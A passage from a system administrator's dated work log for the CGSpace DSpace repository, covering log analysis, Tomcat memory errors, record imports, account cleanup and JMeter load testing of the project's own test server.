+<pre tabindex="0"><code>2018-01-15 12:53:15,810 WARN  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=2386749547D03E0AA4EC7E44181A7552:ip_addr=x.x.x.x:ldap_authentication:type=failed_auth javax.naming.AuthenticationException\colon; [LDAP\colon; error code 49 - 80090308\colon; LdapErr\colon; DSID-0C090400, comment\colon; AcceptSecurityContext error, data 775, v1db1^@]
+</code></pre><ul>
+<li>Looks like we processed 2.9 million requests on CGSpace in 2017-12:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Dec/2017&#34;
+2890041
+
+real    0m25.756s
+user    0m28.016s
+sys     0m2.210s
+</code></pre><h2 id="2018-01-16">2018-01-16</h2>
+<ul>
+<li>Meeting with CGSpace team, a few action items:
+<ul>
+<li>Discuss standardized names for CRPs and centers with ICARDA (don&rsquo;t wait for CG Core)</li>
+<li>Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)</li>
+<li>Start looking at where I was with the AGROVOC API</li>
+<li>Have a controlled vocabulary for CGIAR authors&rsquo; names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
+<li>Need to find the metadata field name that ICARDA is using for their ORCIDs</li>
+<li>Update text for DSpace version plan on wiki</li>
+<li>Come up with an SLA, something like: <em>In return for your contribution we will, to the best of our ability, ensure 99.5% (&ldquo;two and a half nines&rdquo;) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, &hellip;</em></li>
+<li>Add Sisay and Danny to Uptime Robot and allow them to restart Tomcat on CGSpace ✔</li>
+</ul>
+</li>
+<li>I removed Tsega&rsquo;s SSH access to the web and DSpace servers, and asked Danny to check whether there is anything he needs from Tsega&rsquo;s home directories so we can delete the accounts completely</li>
+<li>I removed Tsega&rsquo;s access to Linode dashboard as well</li>
+<li>I ended up creating a Jira issue for my <code>db.jndi</code> documentation fix: <a href="https://jira.duraspace.org/browse/DS-3803">DS-3803</a></li>
+<li>The DSpace developers said they wanted each pull request to be associated with a Jira issue</li>
+</ul>
+<h2 id="2018-01-17">2018-01-17</h2>
+<ul>
+<li>Abenet asked me to proof and upload 54 records for LIVES</li>
+<li>A few records were missing countries (even though they&rsquo;re all from Ethiopia)</li>
+<li>Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses</li>
+<li>In any case, importing them like this:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &amp;&gt; lives.log
+</code></pre><ul>
+<li>And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload</li>
+<li>When I looked there were 210 PostgreSQL connections!</li>
+<li>I don&rsquo;t see any high load in XMLUI or REST/OAI:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    381 40.77.167.124
+    403 213.55.99.121
+    431 207.46.13.60
+    445 157.55.39.113
+    445 157.55.39.231
+    449 95.108.181.88
+    453 68.180.229.254
+    593 54.91.48.104
+    757 104.196.152.243
+    776 66.249.66.90
+# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+     11 205.201.132.14
+     11 40.77.167.124
+     15 35.226.23.240
+     16 157.55.39.231
+     16 66.249.64.155
+     18 66.249.66.90
+     22 95.108.181.88
+     58 104.196.152.243
+   4106 70.32.83.92
+   9229 45.5.184.196
+</code></pre><ul>
+<li>But I do see this strange message in the dspace log:</li>
+</ul>
+<pre tabindex="0"><code>2018-01-17 07:59:25,856 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (org.apache.http.NoHttpResponseException) caught when processing request to {}-&gt;http://localhost:8081: The target server failed to respond
+2018-01-17 07:59:25,856 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
+</code></pre><ul>
+<li>I have NEVER seen this error before, and there is no error before or after that in DSpace&rsquo;s solr.log</li>
+<li>Tomcat&rsquo;s catalina.out does show something interesting, though, right at that time:</li>
+</ul>
+<pre tabindex="0"><code>[====================&gt;                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:02
+[====================&gt;                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
+[====================&gt;                              ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
+[====================&gt;                              ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
+Exception in thread &#34;http-bio-127.0.0.1-8081-exec-627&#34; java.lang.OutOfMemoryError: Java heap space
+        at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
+        at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
+        at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
+        at org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1557)
+        at org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1433)
+        at org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:514)
+        at org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:485)
+        at org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:218)
+        at org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:135)
+        at org.apache.solr.core.SolrCore.execute(SolrCore.java:1967)
+        at org.apache.solr.servlet.SolrDispatchFilter.execute(SolrDispatchFilter.java:777)
+        at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:418)
+        at org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:207)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.solr.filters.LocalHostRestrictionFilter.doFilter(LocalHostRestrictionFilter.java:50)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:221)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:505)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:956)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:436)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1078)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:625)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:318) 
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+</code></pre><ul>
+<li>You can see the timestamp above, which is some Atmire nightly task I think, but I can&rsquo;t figure out which one</li>
+<li>So I restarted Tomcat and tried the import again, which finished very quickly and without errors!</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives2.map &amp;&gt; lives2.log
+</code></pre><ul>
+<li>Looking at the JVM graphs from Munin it does look like the heap ran out of memory (see the blue dip just before the green spike when I restarted Tomcat):</li>
+</ul>
+<p><img src="/cgspace-notes/2018/01/tomcat-jvm-day.png" alt="Tomcat JVM Heap"></p>
+<ul>
+<li>I&rsquo;m playing with maven repository caching using Artifactory in a Docker instance: <a href="https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker">https://www.jfrog.com/confluence/display/RTF/Installing+with+Docker</a></li>
+</ul>
+<pre tabindex="0"><code>$ docker pull docker.bintray.io/jfrog/artifactory-oss:latest
+$ docker volume create --name artifactory5_data
+$ docker network create dspace-build
+$ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss:latest
+</code></pre><ul>
+<li>Then configure the local maven to use it in settings.xml with the settings from &ldquo;Set Me Up&rdquo;: <a href="https://www.jfrog.com/confluence/display/RTF/Using+Artifactory">https://www.jfrog.com/confluence/display/RTF/Using+Artifactory</a></li>
+<li>This could be a game changer for testing and running the Docker DSpace image</li>
+<li>Wow, I even managed to add the Atmire repository as a remote and map it into the <code>libs-release</code> virtual repository, then tell maven to use it for <code>atmire.com-releases</code> in settings.xml!</li>
+<li>Hmm, some maven dependencies for the SWORDv2 web application in DSpace 5.5 are broken:</li>
+</ul>
+<pre tabindex="0"><code>[ERROR] Failed to execute goal on project dspace-swordv2: Could not resolve dependencies for project org.dspace:dspace-swordv2:war:5.5: Failed to collect dependencies at org.swordapp:sword2-server:jar:classes:1.0 -&gt; org.apache.abdera:abdera-client:jar:1.1.1 -&gt; org.apache.abdera:abdera-core:jar:1.1.1 -&gt; org.apache.abdera:abdera-i18n:jar:1.1.1 -&gt; org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Failed to read artifact descriptor for org.apache.geronimo.specs:geronimo-activation_1.0.2_spec:jar:1.1: Could not find artifact org.apache.geronimo.specs:specs:pom:1.1 in central (http://localhost:8081/artifactory/libs-release) -&gt; [Help 1]
+</code></pre><ul>
+<li>I never noticed because I build with that web application disabled:</li>
+</ul>
+<pre tabindex="0"><code>$ mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -Denv=localhost -P \!dspace-sword,\!dspace-swordv2 clean package
+</code></pre><ul>
+<li>UptimeRobot said CGSpace went down for a few minutes</li>
+<li>I didn&rsquo;t do anything but it came back up on its own</li>
+<li>I don&rsquo;t see anything unusual in the XMLUI or REST/OAI logs</li>
+<li>Now Linode alert says the CPU load is high, <em>sigh</em></li>
+<li>Regarding the heap space error earlier today, it looks like it does happen a few times a week or month (I&rsquo;m not sure how far these logs go back, as they are not strictly daily):</li>
+</ul>
+<pre tabindex="0"><code># zgrep -c java.lang.OutOfMemoryError /var/log/tomcat7/catalina.out* | grep -v :0
+/var/log/tomcat7/catalina.out:2
+/var/log/tomcat7/catalina.out.10.gz:7
+/var/log/tomcat7/catalina.out.11.gz:1
+/var/log/tomcat7/catalina.out.12.gz:2
+/var/log/tomcat7/catalina.out.15.gz:1
+/var/log/tomcat7/catalina.out.17.gz:2
+/var/log/tomcat7/catalina.out.18.gz:3
+/var/log/tomcat7/catalina.out.20.gz:1
+/var/log/tomcat7/catalina.out.21.gz:4
+/var/log/tomcat7/catalina.out.25.gz:1
+/var/log/tomcat7/catalina.out.28.gz:1
+/var/log/tomcat7/catalina.out.2.gz:6
+/var/log/tomcat7/catalina.out.30.gz:2
+/var/log/tomcat7/catalina.out.31.gz:1
+/var/log/tomcat7/catalina.out.34.gz:1
+/var/log/tomcat7/catalina.out.38.gz:1
+/var/log/tomcat7/catalina.out.39.gz:1
+/var/log/tomcat7/catalina.out.4.gz:3
+/var/log/tomcat7/catalina.out.6.gz:2
+/var/log/tomcat7/catalina.out.7.gz:14
+</code></pre><ul>
+<li>Overall the heap space usage in the munin graph seems ok, though I usually increase it by 512MB over the average a few times per year as usage grows</li>
+<li>But maybe I should increase it by more, like 1024MB, to give a bit more head room</li>
+</ul>
+<h2 id="2018-01-18">2018-01-18</h2>
+<ul>
+<li>UptimeRobot said CGSpace was down for 1 minute last night</li>
+<li>I don&rsquo;t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499</li>
+<li>I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
+</code></pre><ul>
+<li>Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the <a href="https://cgspace.cgiar.org/handle/10568/35501">Bioversity Journal Articles</a> collection</li>
+<li>It&rsquo;s easy enough to do in OpenRefine, but you have to be careful to only get those items that are uploaded into Bioversity&rsquo;s collection, not the ones that are mapped from others!</li>
+<li>Use this GREL in OpenRefine after isolating all the Limited Access items: <code>value.startsWith(&quot;10568/35501&quot;)</code></li>
+<li>UptimeRobot said CGSpace went down AGAIN and both Sisay and Danny immediately logged in and restarted Tomcat without talking to me <em>or</em> each other!</li>
+</ul>
+<pre tabindex="0"><code>Jan 18 07:01:22 linode18 sudo[10805]: dhmichael : TTY=pts/5 ; PWD=/home/dhmichael ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
+Jan 18 07:01:22 linode18 sudo[10805]: pam_unix(sudo:session): session opened for user root by dhmichael(uid=0)
+Jan 18 07:01:22 linode18 systemd[1]: Stopping LSB: Start Tomcat....
+Jan 18 07:01:22 linode18 sudo[10812]: swebshet : TTY=pts/3 ; PWD=/home/swebshet ; USER=root ; COMMAND=/bin/systemctl restart tomcat7
+Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for user root by swebshet(uid=0)
+</code></pre><ul>
+<li>I had to cancel the Discovery indexing and I&rsquo;ll have to re-try it another time when the server isn&rsquo;t so busy (it had already taken two hours and wasn&rsquo;t even close to being done)</li>
+<li>For now I&rsquo;ve increased the Tomcat JVM heap from 5632 to 6144m, to give ~1GB of free memory over the average usage to hopefully account for spikes caused by load or background jobs</li>
+</ul>
+<h2 id="2018-01-19">2018-01-19</h2>
+<ul>
+<li>Linode alerted and said that the CPU load was 264.1% on CGSpace</li>
+<li>Start the Discovery indexing again:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
+</code></pre><ul>
+<li>Linode alerted again and said that CGSpace was using 301% CPU</li>
+<li>Peter emailed to ask why <a href="https://cgspace.cgiar.org/handle/10568/88090">this item</a> doesn&rsquo;t have an Altmetric badge on CGSpace but does have one on the <a href="https://www.altmetric.com/details/26709041">Altmetric dashboard</a></li>
+<li>Looks like our badge code calls the <code>handle</code> endpoint which doesn&rsquo;t exist:</li>
+</ul>
+<pre tabindex="0"><code>https://api.altmetric.com/v1/handle/10568/88090
+</code></pre><ul>
+<li>I told Peter we should keep an eye out and try again next week</li>
+</ul>
+<h2 id="2018-01-20">2018-01-20</h2>
+<ul>
+<li>Run the authority indexing script on CGSpace and of course it died:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-authority 
+Retrieving all data 
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer 
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+ 
+real    7m2.241s
+user    1m33.198s
+sys     0m12.317s
+</code></pre><ul>
+<li>I tested the abstract cleanups on Bioversity&rsquo;s Journal Articles collection again that I had started a few days ago</li>
+<li>In the end there were 324 items in the collection that were Limited Access, but only 199 had abstracts</li>
+<li>I want to document the workflow of adding a production PostgreSQL database to a development instance of <a href="https://github.com/alanorth/docker-dspace">DSpace in Docker</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ docker exec dspace_db dropdb -U postgres dspace
+$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
+$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace createuser;&#39;
+$ docker cp test.dump dspace_db:/tmp/test.dump
+$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
+$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace nocreateuser;&#39;
+$ docker exec dspace_db vacuumdb -U postgres dspace
+$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
+$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
+</code></pre><h2 id="2018-01-22">2018-01-22</h2>
+<ul>
+<li>Look over Udana&rsquo;s CSV of 25 WLE records from last week</li>
+<li>I sent him some corrections:
+<ul>
+<li>The file encoding is Windows-1252</li>
+<li>There were whitespace issues in the dc.identifier.citation field (spaces at the beginning and end, and multiple spaces in between some words)</li>
+<li>Also, the authors listed in the citation need to be in normal format, separated by commas or colons (however you prefer), not with ||</li>
+<li>There were spaces in the beginning and end of some cg.identifier.doi fields</li>
+<li>Make sure that the cg.coverage.countries field is just countries: ie, no &ldquo;SOUTH ETHIOPIA&rdquo; or &ldquo;EAST AFRICA&rdquo; (the first should just be ETHIOPIA, the second should be in cg.coverage.region instead)</li>
+<li>The current list of regions we use is here: <a href="https://github.com/ilri/DSpace/blob/5_x-prod/dspace/config/input-forms.xml#L5162">https://github.com/ilri/DSpace/blob/5_x-prod/dspace/config/input-forms.xml#L5162</a></li>
+<li>You have a syntax error in your cg.coverage.regions (extra ||)</li>
+<li>The value of dc.identifier.issn should just be the ISSN but you have: eISSN: 1479-487X</li>
+</ul>
+</li>
+<li>I wrote a quick Python script to use the DSpace REST API to find all collections under a given community</li>
+<li>The source code is here: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
+<li>Peter had said that found a bunch of ILRI collections that were called &ldquo;untitled&rdquo;, but I don&rsquo;t see any:</li>
+</ul>
+<pre tabindex="0"><code>$ ./rest-find-collections.py 10568/1 | wc -l
+308
+$ ./rest-find-collections.py 10568/1 | grep -i untitled
+</code></pre><ul>
+<li>Looking at the <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/http.html">Tomcat connector docs</a> I think we really need to increase <code>maxThreads</code></li>
+<li>The default is 200, which can easily be taken up by bots considering that Google and Bing each browse with fifty (50) connections each sometimes!</li>
+<li>Before I increase this I want to see if I can measure and graph this, and then benchmark</li>
+<li>I&rsquo;ll probably also increase <code>minSpareThreads</code> to 20 (its default is 10)</li>
+<li>I still want to bump up <code>acceptorThreadCount</code> from 1 to 2 as well, as the documentation says this should be increased on multi-core systems</li>
+<li>I spent quite a bit of time looking at <code>jvisualvm</code> and <code>jconsole</code> today</li>
+<li>Run system updates on DSpace Test and reboot it</li>
+<li>I see I can monitor the number of Tomcat threads and some detailed JVM memory stuff if I install <code>munin-plugins-java</code></li>
+<li>I&rsquo;d still like to get arbitrary mbeans like activeSessions etc, though</li>
+<li>I can&rsquo;t remember if I had to configure the jmx settings in <code>/etc/munin/plugin-conf.d/munin-node</code> or not—I think all I did was re-run the <code>munin-node-configure</code> script and of course enable JMX in Tomcat&rsquo;s JVM options</li>
+</ul>
+<h2 id="2018-01-23">2018-01-23</h2>
+<ul>
+<li>Thinking about generating a jmeter test plan for DSpace, along the lines of <a href="https://github.com/Georgetown-University-Libraries/dspace-performance-test">Georgetown&rsquo;s dspace-performance-test</a></li>
+<li>I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -c -v &#34;/admin&#34;
+56405
+</code></pre><ul>
+<li>Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#34;^/(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
+     38 /oai/
+  14406 /bitstream/
+  15179 /rest/
+  15191 /handle/
+</code></pre><ul>
+<li>And 3% were to the homepage or search:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#39;^/($|open-search|discover)&#39; | sort | uniq -c
+   1050 /
+    413 /discover
+    170 /open-search
+</code></pre><ul>
+<li>The last 10% or so seem to be for static assets that would be served by nginx anyways:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -v bitstream | grep -Eo &#39;\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$&#39; | sort | uniq -c | sort -n
+      2 .gif
+      7 .css
+     84 .js
+    433 .php
+    882 .txt
+   2551 .png
+</code></pre><ul>
+<li>I can definitely design a test plan on this!</li>
+</ul>
+<h2 id="2018-01-24">2018-01-24</h2>
+<ul>
+<li>Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -E &#34;^/rest&#34; | grep -Eo &#34;(retrieve|expand=[a-z].*)&#34; | sort | uniq -c | sort -n
+      1 expand=collections
+     16 expand=all&amp;limit=1
+     45 expand=items
+    775 retrieve
+   5675 expand=all
+   8633 expand=metadata
+</code></pre><ul>
+<li>I finished creating the test plan for DSpace Test and ran it from my Linode with:</li>
+</ul>
+<pre tabindex="0"><code>$ jmeter -n -t DSpacePerfTest-dspacetest.cgiar.org.jmx -l 2018-01-24-1.jtl
+</code></pre><ul>
+<li>Atmire responded to <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">my issue from two weeks ago</a> and said they will start looking into DSpace 5.8 compatibility for CGSpace</li>
+<li>I set up a new Arch Linux Linode instance with 8192 MB of RAM and ran the test plan a few times to get a baseline:</li>
+</ul>
+<pre tabindex="0"><code># lscpu
+# lscpu 
+Architecture:        x86_64
+CPU op-mode(s):      32-bit, 64-bit
+Byte Order:          Little Endian
+CPU(s):              4
+On-line CPU(s) list: 0-3
+Thread(s) per core:  1
+Core(s) per socket:  1
+Socket(s):           4
+NUMA node(s):        1
+Vendor ID:           GenuineIntel
+CPU family:          6
+Model:               63
+Model name:          Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz
+Stepping:            2
+CPU MHz:             2499.994
+BogoMIPS:            5001.32
+Hypervisor vendor:   KVM
+Virtualization type: full
+L1d cache:           32K
+L1i cache:           32K
+L2 cache:            4096K
+L3 cache:            16384K
+NUMA node0 CPU(s):   0-3
+Flags:               fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm cpuid_fault invpcid_single pti retpoline fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat
+# free -m
+              total        used        free      shared  buff/cache   available
+Mem:           7970         107        7759           1         103        7771
+Swap:           255           0         255
+# pacman -Syu
+# pacman -S git wget jre8-openjdk-headless mosh htop tmux
+# useradd -m test
+# su - test
+$ git clone -b ilri https://github.com/alanorth/dspace-performance-test.git
+$ wget http://www-us.apache.org/dist//jmeter/binaries/apache-jmeter-3.3.tgz
+$ tar xf apache-jmeter-3.3.tgz
+$ cd apache-jmeter-3.3/bin
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline2.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline2.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-24-linode5451120-baseline3.jtl -j ~/dspace-performance-test/2018-01-24-linode5451120-baseline3.log
+</code></pre><ul>
+<li>Then I generated reports for these runs like this:</li>
+</ul>
+<pre tabindex="0"><code>$ jmeter -g 2018-01-24-linode5451120-baseline.jtl -o 2018-01-24-linode5451120-baseline
+</code></pre><h2 id="2018-01-25">2018-01-25</h2>
+<ul>
+<li>Run another round of tests on DSpace Test with jmeter after changing Tomcat&rsquo;s <code>minSpareThreads</code> to 20 (default is 10) and <code>acceptorThreadCount</code> to 2 (default is 1):</li>
+</ul>
+<pre tabindex="0"><code>$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads.log
+$ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.jmx -l ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.jtl -j ~/dspace-performance-test/2018-01-25-linode5451120-tomcat-threads2.log
